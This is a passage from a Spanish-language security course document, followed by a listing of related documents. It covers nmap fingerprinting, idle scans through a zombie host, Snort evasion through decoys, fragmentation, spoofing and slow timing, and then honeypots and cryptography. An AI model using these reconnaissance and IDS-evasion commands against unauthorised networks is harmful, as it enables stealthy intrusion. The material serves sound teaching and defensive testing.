80 Si la maquina objetivo es Windows la respuesta sera similar a la siguiente: SENT (0.0570s) ICMP > echo request (type=8/code=0) ttl=57 id=39881 iplen=32 ipopts={ NOP??{\x08\x03\x04}} RCVD (0.0570s) ICMP > echo request (type=8/code=0) ttl=57 id=39881 iplen=32 ipopts={ NOP??{\x08\x03\x04}} RCVD (0.0570s) ICMP > echo reply (type=0/code=0) ttl=64 id=38533 iplen=28 Como puede apreciarse, la diferencia radica en la respuesta RCVD entre ambas máquinas, mientras que en la máquina Windows el paquete contiene las opciones IP establecidas a ipopts={ NOP??{\x08\x03\x04}} la máquina bajo GNU/Linux ha comprendido correctamente la opción IP y no ha registrado ningún mensaje de error o warning, lo que nos permite dictaminar la plataforma de un objetivo, aunque este se encuentre detrás de un Firewall. Idle Scan, tu mejor aliado Si la combinación de las técnicas anteriormente descritas no permite obtener información sobre puertos abiertos en la máquina objetivo, es probable que la conexión no sea posible establecerse entre la máquina del atacante y la máquina objetivo, al menos de forma directa, probablemente el Firewall tenga reglas para que solamente unas cuantas direcciones IP tengan acceso a los servicios de la máquina. En estos casos es necesario utilizar una técnica avanzada conocida como Idle Scan, que consiste básicamente en el uso de un Zombie para realizar el escaneo de puertos contra la máquina objetivo, esto es conseguido por medio de una vulnerabilidad a la que están expuestos algunos sistemas operativos, por supuesto Windows es uno de ellos =D, que consiste en predecir cual es el IPID (Número de Identificación de Fragmento de un paquete IP) para posteriormente consultar si un puerto se encuentra abierto o no en la máquina atacada. El flujo de este mecanismo de escaneo es el siguiente: 1. La máquina del atacante ha identificado una máquina vulnerable a ser tratada como Zombie, por lo tanto le envía un paquete SYN/ACK, dado que la maquina Zombie no ha enviado un paquete SYN no entiende el paquete SYN/ACK que envía la máquina del atacante, por este motivo, retorna un paquete RST con el IPID (por ejemplo el 3345) 2. El atacante con esta información enviá un paquete SYN a la maquina objetivo con el IPID (en este caso el 3345) haciéndose pasar por el Zombie, si la máquina remota acepta conexiones de dicha máquina (del Zombie), puede decirse que puede explotarse la relación de confianza que existe entre ambas maquinas, una oportunidad frecuentemente aprovechada por un atacante 3. La maquina objetivo, enviará entonces un paquete SYN/ACK si el puerto escaneado en el paso anterior se encuentra abierto, o simplemente enviará un paquete RST si esta cerrado, en el caso de que este Filtrado, la máquina objetivo ignorara el paquete y no emitirá ningún tipo de respuesta 4. Si la máquina Zombie en este punto, recibe un paquete SYN/ACK por parte de la

81 máquina objetivo, responderá con un paquete RST dado que en principio no ha enviado ninguna petición SYN, (esta la ha enviado el atacante en el paso 2), al hacer esto, el IPID aumenta en uno (es decir ahora es 3346) si por el contrario recibe un paquete RST, (indicando que el puerto en la máquina objetivo esta cerrado) la maquina Zombie omitirá este paquete, lo que quiere decir que el IPID se quedará sin modificaciones 5. El atacante posteriormente, enviá un paquete SYN/ACK a la máquina Zombie, nuevamente, el Zombie no ha enviado ningún paquete de sincronización anteriormente, así que intenta resetear la conexión enviando un paquete RST, con lo que el IPID aumenta nuevamente en uno 6. El atacante después de recibir el paquete RST del Zombie, puede determinar si un puerto esta abierto o cerrado/filtrado, simplemente comparando el IPID, si este ha aumentado en 2 (el paquete RST enviado desde Zombie hacia el Objetivo y RST desde Zombie hacia atacante) quiere decir que el puerto se encuentra abierto, si por el contrario ha aumentado solamente en 1 (el paquete RST enviado desde Zombie hacia atacante) indica que el puerto se encuentra cerrado o filtrado por firewall desde la máquina Zombie. Se trata de un mecanismo muy eficaz (aunque lento), que permite explotar relaciones de confianza y huecos en las reglas del firewall. Para utilizar esta técnica pueden seguirse los siguientes pasos: 1. Identificar las máquinas en el segmento de red del objetivo a las cuales, se tiene acceso y ademas son susceptibles de ser tratadas como Zombies, o que es lo mismo, el mecanismo de generación de IPID es secuencial, para esto puede utilizarse MetaSploit Framework msf > use auxiliary/scanner/ip/ipidseq msf auxiliary(ipidseq) > show options Module options (auxiliary/scanner/ip/ipidseq): Name Current Setting Required Description - INTERFACE no The name of the interface RHOSTS /24 yes The target address range or CIDR identifier RPORT 80 yes The target port SNAPLEN yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds msf auxiliary(ipidseq) > set RHOSTS /24 RHOSTS => /24 msf auxiliary(ipidseq) > run [*] Error: : #<Class:0x7f28ea2ff3e0> execution expired [*] s IPID sequence class: All zeros [*] Error: : #<Class:0x7f28eb0fb0e8> execution expired [*] Error: : #<Class:0x7f28ead0e1b0> execution expired [*] Error: : #<Class:0x7f28eabeea28> execution expired [*] Error: : #<Class:0x7f28ea8ffa88> execution expired [*] Error: : #<Class:0x7f28ea7a1100> execution expired [*] Error: : #<Class:0x7f28ea66ee68> execution expired [*] Scanned 026 of 256 hosts (010% complete)

82 [*] s IPID sequence class: Incremental! [*] s IPID sequence class: All zeros [*] s IPID sequence class: All zeros. Por otro lado también es posible utilizar un script de nmap que permite realizar un escaneo en busca de máquinas que sean susceptibles de ser tratadas como Zombies, esta herramienta puede ser descargada desde Una vez descargado el archivo ipidseq.nse se debe ubicar en el directorio scripts donde se encuentre instalado nmap. Si se ha utilizado apt-get o un paquete deb/rpm para instalarlo, lo mas probable es que se encuentre en las librerías compartidas de usuario /usr/share/nmap. Para utilizarlo se puede ejecutar el comando: # nmap -vv script ipidseq /24 En el ejemplo anterior se ha encontrado una máquina susceptible de ser tratada como Zombie, por lo tanto puede utilizarse para tratar de identificar los puertos abiertos en la máquina objetivo (que en este caso es la ) simplemente ejecutando: >nmap -Pn -si Starting nmap 5.21 ( ) at :37 CEST Idle scan using zombie ( :80); Class: Incremental nmap scan report for Host is up (0.051s latency). Not shown: 987 closedfiltered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 5357/tcp open unknown 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown MAC Address: 08:00:27:E3:E3:3D (Cadmus Computer Systems) nmap done: 1 IP address (1 host up) scanned in seconds Con esto se ha conseguido filtrar información sobre la máquina que se encuentra protegida por el firewall

83 EVASION DE IDS Hasta aquí hemos visto como utilizar nmap y ejecutar un ataque de reconocimiento de forma sigilosa, evadiendo mecanismos de seguridad en el objetivo y evitando ser detectados en nuestras acciones. Ahora se intentará evadir las reglas y preprocessors de snort para que de este modo, el escaneo efectuado contra el objetivo sea lo mas silencioso posible, tratando de no despertar sospechas ni levantar ninguna alarma de las definidas en snort (con las reglas y opciones de los preprocessors correctamente configuradas obviamente!!!). Intentaremos utilizar diferentes opciones de nmap para realizar un escaneo a diferentes máquinas en el segmento de red (snort se ejecutará como NIDS) de esta forma se medirá el nivel de eficiencia de snort y las opciones de configuración disponibles ante las diferentes técnicas de evasión existentes en nmap. Partiendo de la base que snort se encuentra en ejecución con los preprocessors HTTP Inspect, Frag3, Stream5, sfportscan, entre otros más, se intentará ejecutar comandos nmap contra máquinas pertenecientes al segmento de red inspeccionado y se detalla el comportamiento de snort. Entonces iniciaremos snort de la siguiente forma: # snort -i eth0 -A console daq dump -c /etc/snort/snort.conf Posteriormente, las siguientes pruebas determinaran el comportamiento de snort ante ataques de reconocimiento utilizando nmap Decoy Scan con nmap Si ejecutamos un escaneo Stealthy con 7 señuelos con el siguiente comando: nmap -ss -D , , , , , ,ME snort identificará el ataque y generará una alerta como la siguiente: 06/26-18:05: [**] [122:2:0] (portscan) TCP Decoy Portscan [**] [Priority: 3] {PROTO:255} > Fragmentación de Paquetes nmap Si ejecutamos un escaneo TCP sin ejecutar ICMP_REPLY/ICMP_ECHO y fragmentando los paquetes a 8 bytes: # nmap -PN -P0 -f

84 el preprocessor Frag3 de snort identificará el ataque de fragmentación de paquetes y generará una alarma, ademas, el preprocessor sfportscan identificará que se intentaba realizar un escaneo de puertos TCP. 06/26-18:29: [**] [123:13:1] (spp_frag3) Tiny fragment [**] [Priority: 3] {TCP} > /26-18:29: [**] [123:13:1] (spp_frag3) Tiny fragment [**] [Priority: 3] {TCP} > /26-18:29: [**] [123:13:1] (spp_frag3) Tiny fragment [**] [Priority: 3] {TCP} > /26-18:29: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > /26-18:29: [**] [123:13:1] (spp_frag3) Tiny fragment [**] [Priority: 3] {TCP} > Host Aleatorios con nmap Ahora intentaremos ejecutar un escaneo de puertos generando un grupo de direcciones aleatorias y cambiando el puerto origen de la petición. nmap --source-port 80 -ss -n --randomize-hosts -PN Con esto snort solamente consigue obtener una alarma relacionada con el escaneo: 06/26-18:49: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > Escaneo de nmap + spoofing sobre la identidad del atacante Con nmap es posible definir una dirección IP falsa, puertos falsos y MAC falsas para realizar un escaneo contra una máquina objetivo. De esta forma aunque exista un sistema de detección de intrusos establecido en la red donde se localizará el objetivo, este detectará que se está realizando un escaneo de puertos pero en los logs se verá la dirección origen que el atacante eligió mostrar. Se trata de una técnica muy útil, sin embargo no es muy sutil, ya que aunque la identidad del atacante no se ve comprometida (en teoría), es posible que se disparen todas las alarmas en el objetivo por un posible ataque de reconocimiento. # nmap -PN --spoof-mac 00:11:22:33:44:55 --source-port 80 -n -e eth0 -S La dirección no existe, sin embargo, snort simplemente ha alertado que se esta llevando a cabo un escaneo de puertos desde la máquina con dirección IP /01-18:43: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > Como puede apreciarse, la alerta generada no contiene trazas relacionadas con la dirección IP real del atacante

85 Como nota adicional, se debe tener en cuenta desactivar consultas DNS reversas (-n) y no ejecutar un ping antes del escaneo (-PN) y no se debe utilizar un escaneo TCP (-st) ya que en dicho caso snort detectará la dirección real del atacante. # nmap -st -PN --spoof-mac 00:11:22:33:44:55 --source-port 80 -n -e eth0 -S WARNING: -S will only affect the source address used in a connect() scan if you specify one of your own addresses. Use -ss or another raw scan if you want to completely spoof your source address, but then you need to know what you re doing to obtain meaningful results. WARNING: -g is incompatible with the default connect() scan (-st). Use a raw scan such as -ss if you want to set the source port. El resultado en la traza de snort. 07/01-19:53: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > Como se puede apreciar, snort ha identificado la dirección IP real del atacante. Escaneo controlando el tiempo de entrega de paquetes con nmap Se ejecuta un escaneo con nmap utilizando control de tiempo de entrega de los paquetes a la máquina objetivo, de esta forma, es mucho más difícil que snort pueda identificar el ataque, para conseguir esto se utiliza la opción -T como se ha indicado anteriormente, dependiendo del mecanismo utilizado (T1, T2, T3, etc.) el tiempo del escaneo puede variar considerablemente. T0 nmap -T snort no conseguirá identificar el ataque de escaneo de puertos sin embargo, el tiempo empleado en el escaneo será bastante alto, entre 2 y 4 horas. T1 nmap -T snort no conseguirá identificar el ataque de escaneo de puertos sin embargo, el tiempo empleado en el escaneo será bastante alto, entre 30 y 45 minutos. T2 nmap -T snort no podrá identificar que se trata de un ataque de reconocimiento, pero el escaneo demora aproximadamente 20 minutos. T3 nmap -T snort no identifica el ataque de reconocimiento llevado a cabo por nmap, y tarda algo de

86 minutos. T4 nmap -T snort identifica el ataque de reconocimiento y genera una alarma relacionada con el escaneo realizado 06/26-19:24: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > T5 nmap -T snort detecta el ataque y genera tres alarmas por el escaneo, pero la ejecución de nmap ha tardado menos de un minuto. 06/26-19:10: [**] [122:3:0] (portscan) TCP Portsweep [**] [Priority: 3] {PROTO:255} > /26-19:10: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > /26-19:11: [**] [122:1:0] (portscan) TCP Portscan [**] [Priority: 3] {PROTO:255} > NOTA: Los tiempos tomados y las alarmas generadas son un indicativo aproximado. Dependiendo del entorno que se desee escanear, es posible que snort pueda detectar el ataque. En un entorno real con unos niveles de seguridad óptimos, probablemente sea conveniente utilizar valores mas bajos (-T0, -T1) aunque el escaneo puede llevar incluso horas, sin embargo si es prioritario no despertar ninguna sospecha, esta es la mejor opción

87 HONEYPOTS Gran parte de los esfuerzos del área de seguridad a la hora de establecer medidas de protección se basan en el aprendizaje de las técnicas utilizadas por los atacantes. Con este propósito, uno de los pilares fundamentales del personal dedicado a la seguridad está enfocado a la recopilación de información para su posterior análisis, para poder aplicar y reforzar las medidas de seguridad en la organización en función de las conclusiones obtenidas. Pero, qué información se recopila en este proceso y de qué forma? Existen muchas fuentes de información conocidas como pueden ser los informes de nuevas vulnerabilidades de aplicaciones concretas, estudios de analistas independientes, nuevas técnicas de ataque, o incluso información obtenida del último ataque sufrido sobre un recurso corporativo. Igual que en la película de hacker, no es difícil imaginar técnicas de obtención de información que estén basadas en la implantación de señuelos o trampas en forma de aplicaciones, cuyo propósito es registrar la actividad sospechosa de los potenciales atacantes, para que éstos actúen sin darse cuenta de que su comportamiento está siendo realmente estudiado. Qué es un honeypot? Un honeypot puede ser una aplicacion que simula, de una forma más o menos interactiva, servicios o aplicaciones que registran la actividad sospechosa que un atacante pueda realizar sobre ellos. Al conjunto de honeypots que presentan una arquitectura lógica de red simulando un conjunto de sistemas, servicios y aplicaciones relacionadas, se los denomina como honeynet. Por supuesto, en este tipo de entornos simulados no existe información real sensible ni relativa a la organización, pero si información aparentemente interesante que motive al atacante y le haga perder tiempo, al mismo tiempo que proporciona información sobre técnicas y métodos de ataque. En esta línea existe un proyecto dedicado a sumar esfuerzos y desarrollar pautas para la creación, gestión y divulgación de estos sistemas, denominado el HoneyNet Project (http://www.honeynet.org/). En su web es posible encontrar tanto papers con información técnica como referencias a los denominados chapters de cada país relacionados con el proyecto. En cualquier caso, en este tipo de entornos es recomendable no olvidar que estamos tratando con sistemas que interactúan con potenciales intrusos, y que los clasificamos como honeypots porque tanto la información que se expone como los sistemas que puedan verse

88 comprometidos no interfieren de forma negativa en el proceso de negocio de la organización. Como habrán supuesto, el interés de estos sistemas y entornos es doble. Por una parte, el registro de la actividad del atacante que interactúa con el honeypot o la honeynet muestra nuevas técnicas o tendencias de ataques de los que podemos aprender, y por lo tanto, permite planificar e implantar las medidas de seguridad oportunas a corto, medio e incluso a largo plazo para paliar posibles futuros ataques sobre los sistemas productivos de la empresa. Al mismo tiempo, la existencia de sistemas intencionadamente vulnerables conviviendo con sistemas de producción convenientemente securizados (aunque como saben, nunca lo suficiente) proporciona una forma muy efectiva de dirigir la atención del atacante lejos de los sistemas de negocio. Es importante, no obstante, que el entorno vulnerable esté adecuadamente aislado, evitando que pueda servir de puente hacia otros sistemas internos, y por tanto convirtiendo una herramienta en un problema. Cómo podemos recopilar, analizar y aprovechar todos los datos que se van generando? Para ello existen correladores de información que ofrecen una integración bastante sencilla con la mayoría de honeypots existentes, y que a su vez son lo suficientemente flexibles como para adaptarlos al sistema en el que debamos instalarlos. Clasificación de Honeypots Como explicamos recien, un honeypot no es más que una aplicación, servicio o sistema que simula ser lo que no es. No tiene un valor productivo para quien lo implanta y está preparado para ser sondeado, atacado y comprometido. Es básicamente un señuelo con el objeto de engañar al atacante que pretenda amenazar nuestros sistemas, al mismo tiempo que ayuda a entender las técnicas de ataque utilizadas. Por estas razones, es lógico pensar que cualquier actividad que se genere desde o hacia un honeypot, será muy probablemente una actividad ilegítima o no autorizada. Existen diversas formas de clasificar los honeypots. Aquí lo haremos basándonos en dos de sus propiedades principales: la localización concreta dentro de una red y la interacción que permite con el atacante. Según la LOCALIZACIÓN, pueden situarse en un entorno de: Honeypots en Producción El objetivo que se pretende alcanzar al implantar un honeypot en una red en producción no es otro que la obtención de información sobre las técnicas empleadas para tratar de vulnerar los sistemas que componen dicha infraestructura. El abanico de posibilidades que nos ofrece un honeypot en una red en producción es muy amplio. Desde la posibilidad de ubicar el honeypot en el segmento de la red de servidores internos de la compañía, con el objetivo de detectar posibles accesos por parte de usuarios internos a recursos críticos de la organización (por ejemplo algun archivo del sector contable), hasta la publicación de un servicio web con idéntica configuración y diseño que el

89 mismo servicio que está en producción o preproducción. El mayor inconveniente que supone esta elección es el peligro que supone para los sistemas organizativos el permitir (incluso provocar) que el tráfico malintencionado conviva con el legítimo. Honeypots en Desarrollo En este caso, el principal objetivo es la recopilación de la mayor cantidad de información que permita al investigador poder analizar las nuevas tendencias en los métodos de ataque, así como los principales objetivos perseguidos y los distintos orígenes de los ataques. El resultado de este análisis es recogido en informes cuyo objetivo es respaldar la toma de decisiones en la implantación de las medidas de seguridad preventivas. La principal ventaja de situar el honeypot en una red independiente, dedicada únicamente a la investigación, es la separación del sistema vulnerable del resto de sistemas productivos y evitar así la posibilidad de sufrir un ataque a través del propio honeypot. Por el contrario, el inconveniente es la cantidad de recursos necesarios. Sobre la arquitectura a emplear profundizaremos en próximos posts. Otro método de clasificación de los honeypots es el que define la INTERACCIÓN con el atacante. En este caso, los honeypots se agrupan en dos tipos: Baja Interacción: El honeypot emula un servicio, una aplicación o un sistema vulnerable. Sus características principales son su sencilla instalación y configuración, junto con lo limitado de su capacidad para obtener diferentes tipos de datos. Unos ejemplos de honeypots de este tipo son: Honeyd: Quizás uno de los honeypots más sencillos y populares. Es un demonio que crea hosts virtuales en una red. Los anfitriones pueden ser configurados para ejecutar servicios arbitrarios, y su comportamiento puede ser adaptado para que simule estar en ejecución en ciertos sistemas operativos. HoneyC: El objetivo de este honeypot es la identificación de servidores web maliciosos en la red. Para ello emula varios clientes y recaba la mayor cantidad posible de información de las respuestas de los servidores cuando estos contestan a sus solicitudes de conexión. HoneyC es ampliable de diversas formas: pueden utilizarse diferentes clientes, sistemas de búsqueda y algoritmos de análisis. Nephentes: Honeypot de baja interacción que pretende emular vulnerabilidades conocidas para recopilar información sobre posibles ataques. Nepenthes está diseñado para emular vulnerabilidades que los gusanos utilizan para propagarse y cuando estos intentan aprovecharlas, captura su código para su posterior análisis. Honeytrap: Este honeypot está destinado a la observación de ataques contra servicios de red. En contraste con otros honeypots, que se suelen centrar en la recogida de malware, el objetivo de Honeytrap es la captura de exploits. Glastopf: Emula miles de vulnerabilidades para recopilar datos de los ataques contra aplicaciones web. La base para la recolección de información es la respuesta

90 correcta que se le ofrece al atacante cuando intenta explotar la aplicación web. Es fácil de configurar y una vez indexado por los buscadores, los intentos de explotación de sus vulnerabilidades se multiplican. Alta Interacción: En este caso el honeypot es una aplicación con la cual se puede interactuar y que responde como se espera, con la diferencia de que su diseño está orientado a realizar un registro exhaustivo de la actividad que se lleva a cabo sobre ella y de que la información que contiene no es relevante en ningún caso. HI-HAT (High Interaction Honeypot Analysis Toolkit): Herramienta que transforma aplicaciones php en aplicaciones honeypot de alta interacción. Además ofrece una interfaz web que permite consultar y monitorizar los datos registrados. HoneyBow: Herramienta de recopilación de malware que puede integrarse con el honeypot de baja interacción Nephentes para crear una herramienta de recolección mucho más completa. Sebek: Funciona como un HIDS (Host-based Intrusion Detection System) permitiendo capturar una gran variedad de información sobre la actividad en un sistema ya que actúa a muy bajo nivel. Es una arquitectura cliente-servidor, con capacidad multiplataforma, que permite desplegar honeypots cliente en sistemas Windows, Linux, Solaris, *BSD, etc., que se encargan de la captura y el envío de la actividad recopilada hacia el servidor Sebek. Podríamos decir que forma parte de una tercera generación de honeypots. Capture-HPC: Del tipo cliente, como HoneyC, identifica servidores potencialmente maliciosos interactuando con ellos, utilizando una máquina virtual dedicada y observando cambios de sistema no previstos o autorizados. Otra opción a destacar en cuanto a la elección de un honeypot es la de la web Project HoneyPot (http://www.projecthoneypot.org/). Se trata de un portal que facilita un recurso web para usarlo como honeypot. Este genera una página con un código script, la cual utiliza diversas técnicas para la recopilación de información (IPs, logins usados en ataques de fuerza bruta, spammers, etc ). Como trabajo práctico, pueden intentar instalar el honeypot Kojoney (http://kojoney.sourceforge.net/), el cual les recomiendo tenerlo instalado en sus entornos de producción ya que emula un servidor SSH

91 CRIPTOGRAFIA PROTECCION DE DATOS En nuestro día a día si queremos guardar información confidencial sobre nuestros clientes podremos destinar una oficina especial en la cual solo pueda ingresar personal autorizado llave de por medio y si fuera necesario podríamos protegerla designando un guardia para que custodie la oficina. Si tenemos que enviar información confidencial por correo utilizaremos los servicios de la mejor empresa de correo y si queremos guardar nuestro dinero para que no nos lo roben podremos guardarlo en una caja fuerte del banco que nos resulte más seguro. Por desgracia en una red informática estas opciones no existen y se tardó bastante en poner al alcance de todos la principal forma de proteger nuestra información: la criptografía. El cifrado de los datos nos va a permitir desde proteger nuestro correo personal para que ningún curioso lo pueda leer, hasta controlar el acceso a nuestros archivos de forma que sólo personas autorizadas puedan examinar y modificar su contenido, pasando por proteger nuestras claves cuando nos conectamos a un sistema remoto o nuestros datos bancarios cuando realizamos una compra a través de Internet. La criptografía es la ciencia que trata lo problemas teóricos relacionados con la seguridad en el intercambio de mensajes en clave entre un emisor y un receptor que utilizan un canal de comunicación. Esta ciencia está dividida en dos grandes ramas: la criptografía, ocupada del cifrado de mensajes en clave y del diseño de criptosistemas y el criptoanálisis, que trata de descifrar los mensajes en clave, rompiendo así el criptosistema. El uso original de la criptografía era proteger la confidencialidad de informaciones militares y políticas. En la actualidad resulta interesante y útil para cualquier persona que esté interesada en la confidencialidad de sus datos. Hoy por hoy además de mantener en secreto ciertos datos se busca garantizar la autenticación en la transmisión de los datos. Es decir que podamos confiar ciegamente que el emisor del mensaje es quien dice ser, y no otro, y la integridad del mensaje que leemos, esto significa que sea el mismo que nos enviaron. Tratemos de ver de forma sencilla como es el proceso de encriptación... El emisor emite un texto plano, que es tratado por un cifrador con la ayuda de una clave, k, creando un texto cifrado (criptograma). Este criptograma llega al descifrador a través de un canal de comunicaciones. El descifrador convierte el criptograma de nuevo en texto plano, usando ahora otra clave, k (veremos más adelante que esta clave puede o no ser la misma que la utilizada para cifrar), y este texto plano ha de coincidir con el emitido inicialmente para que se cumplan los principios básicos de la criptografía moderna. El elemento más importante en este proceso es el cifrador, que ha de utilizar el algoritmo de cifrado para convertir el texto plano en un criptograma

92 Usualmente, para hacer esto, el cifrador depende de un parámetro exterior, que se conoce como clave de cifrado, que es aplicado a una función matemática irreversible. Sólo es posible invertir la función si se dispone de la clave de descifrado. Existen dos tipos básicos de criptografía: 1. la criptografía simétrica, 2. la criptografía asimétrica Cómo es el proceso de criptografía simétrica? En la criptografía simétrica se utiliza siempre la misma clave, esta clave es compartida tanto por el generador de una transacción o un mensaje como por el receptor. El problema radica en que al tener que compartir la misma clave no se puede identificar el emisor o fuente de un mensaje. En la criptografía asimétrica se utilizan claves distintas, es decir que cada una de las partes que intervienen en la transacción poseen un par de claves: una clave privada y una clave pública. Cómo es el proceso de criptografía asimétrica? En este sistema, cada persona obtiene un par de claves, llamadas clave pública y clave privada. La clave pública de cada una, como su nombre lo indica, es de dominio público y la privada se mantiene en secreto. La necesidad de que emisor y receptor compartan la misma clave queda eliminada: las comunicaciones sólo necesitan de la clave pública y entonces la clave privada no se transmite ni se comparte, es una "realmente Privada". De ésta forma no es necesario confiar en los canales de comunicación, corriendo el riesgo de que alguien esté 'escuchando' en la línea de comunicación o de que se viole el secreto de la clave privada. Cualquier persona puede enviar un mensaje confidencial con sólo utilizar la clave pública, pero el mensaje sólo puede desencriptarse con la clave privada que posee únicamente el receptor. Más aún, la criptografía asimétrica puede utilizarse tanto para la autenticación (firmas digitales) como para mantener la privacidad (encriptado). La ventaja principal de este método de cifrado es su mayor seguridad. Las claves privadas no se transmiten ni se revelan a persona alguna. En el sistema simétrico, siempre existe la posibilidad de que sea descubierta durante la transmisión

93 FIRMA DIGITAL Otra ventaja importante consiste en que proporciona un método de firma digital. La autenticación digital es un proceso por el cual el receptor de un mensaje digital puede mantener confidencial la identidad del que lo envía y/o la integridad del mensaje. cómo es este proceso en la práctica? Veámoslo en un ejemplo, supongamos que Mariana le quiere enviar un documento a Fabián, obtiene su clave pública y la utiliza para encriptar el documento; luego lo envía. Cuando Fabián lo recibe, utiliza su clave privada para desencriptarlo y leerlo. Nadie escucha ni puede desencriptar el mensaje. Por qué? Porque Fabián recibe documentos que sólo él puede desencriptar. En este caso el mensaje está protegido mientras la clave privada permanece solo en manos de Fabián. Cuando un receptor desea recibir una información cifrada, ha de hacer llegar a todos los potenciales emisores su clave pública, para que estos cifren los mensajes con dicha clave. De este modo, el único que podrá descifrar el mensaje será el legítimo receptor, mediante su clave privada

SEGURIDAD INFORMATICA. Prof.: Ing. Alberto Esteban Barrera Alumno: Ricardo Farfán Patiño

SEGURIDAD INFORMATICA. Prof.: Ing. Alberto Esteban Barrera Alumno: Ricardo Farfán Patiño SEGURIDAD INFORMATICA Prof.: Ing. Alberto Esteban Barrera Alumno: Ricardo Farfán Patiño DEFINICIONES DE HACKER: Un hacker (del inglés hack, recortar), también conocidos como sombreros blancos es el neologismo

Más detalles

Seguridad en Informática Aspectos Duros y Blandos. Dr. José Fernández G.

Seguridad en Informática Aspectos Duros y Blandos. Dr. José Fernández G. Seguridad en Informática Aspectos Duros y Blandos Dr. José Fernández G. Octubre 2013 Agenda Definición de Seguridad Informática. Objetivos del Área de Seguridad Informática. Amenazas y sus distintos tipos.

Más detalles

Seguridad Informática

Seguridad Informática Seguridad Informática Cuando hablamos de Informática nos referimos a todos los recursos que están relacionados con el manejo de la información y, como es de todos conocido la información viene a representar

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 2: Configuración de VPN y escaneo de puertos. Objetivos: En esta práctica

Más detalles

Redes de comunicación

Redes de comunicación UNIVERSIDAD AMERICANA Redes de comunicación Recopilación de teoría referente a la materia Ing. Luis Müller 2011 Esta es una recopilación de la teoría referente a la asignatura Redes de Comunicación, a

Más detalles

LOS SISTEMAS DE INFORMACIÓN

LOS SISTEMAS DE INFORMACIÓN LOS SISTEMAS DE INFORMACIÓN INTRODUCCION Podemos entender como seguridad un estado de cualquier tipo de información (informático o no) que nos indica que ese sistema está libre de peligro, daño o riesgo.

Más detalles

Software y Aplicaciones

Software y Aplicaciones Software y Aplicaciones 1. Consejo de Seguridad Informática ST04-006 Saber qué son los Parches Cuando los proveedores advierten vulnerabilidades en sus productos, a menudo largan parches para solucionar

Más detalles

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)

Más detalles

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com 3-SCANNING NETWORK MAPPING. El proceso de Network Mapping, consiste en tratar de identificar la arquitectura (Topología) de la red a la cual vamos a realizarle las pruebas de seguridad y auditoria a nivel

Más detalles

Hoy, esta posibilidad es real y efectiva si no se mantiene la computadora protegida de manera total.

Hoy, esta posibilidad es real y efectiva si no se mantiene la computadora protegida de manera total. Tercer paso: blindar el equipo Aprenderemos ahora a proteger la computadora no solo de ataques digitales, sino de usuarios malintencionados que intenten destruir la integridad de nuestros datos o acceder

Más detalles

La Biblia del Footprinting

La Biblia del Footprinting La Biblia del Footprinting Juan Antonio Calles García Pablo González Pérez Flu Project 2011 CONTENIDO Prólogo... 3 La Fase de Footprinting... 4 1. Visitar el sitio Web... 4 2. Qué saben los buscadores

Más detalles

La gestión de la seguridad informática. La gestión de la seguridad informática. Contenido. Consideraciones 22/03/2013

La gestión de la seguridad informática. La gestión de la seguridad informática. Contenido. Consideraciones 22/03/2013 La gestión de la seguridad informática 1 Contenido La gestión de la seguridad información. 2 Hacking ético 3 Hacking Víctor Cuchillac La gestión de la seguridad informática Consideraciones Por dónde empezamos?

Más detalles

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS

Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas por la CNBS Julio 2005 Proceso de Auditoría de la Seguridad de la Información en las Instituciones Supervisadas

Más detalles

Capítulo I Antedecentes documento] En este capítulo de denotan los conceptos básicos para la compresión del proyecto.

Capítulo I Antedecentes documento] En este capítulo de denotan los conceptos básicos para la compresión del proyecto. Antedecentes documento] En este capítulo de denotan los conceptos básicos para la compresión del proyecto. 1.1 Concepto de la Seguridad Informática La seguridad informática es una disciplina que se relaciona

Más detalles

GUIA ILUSTRADA: PC SECURITY PLUS SUITE Versión 06, 21-11-2013

GUIA ILUSTRADA: PC SECURITY PLUS SUITE Versión 06, 21-11-2013 GUIA ILUSTRADA: PC SECURITY PLUS SUITE Versión 06, 21-11-2013 Tabla de contenido: 1. PANEL INICIO MCAFEE:... 4 1.1 INICIO:... 4 2. CENTRO DE NAVEGACIÓN:... 5 2.1 CONFIGURACIÓN:... 6 2.1.1 SUSCRIPCIÓN:...

Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

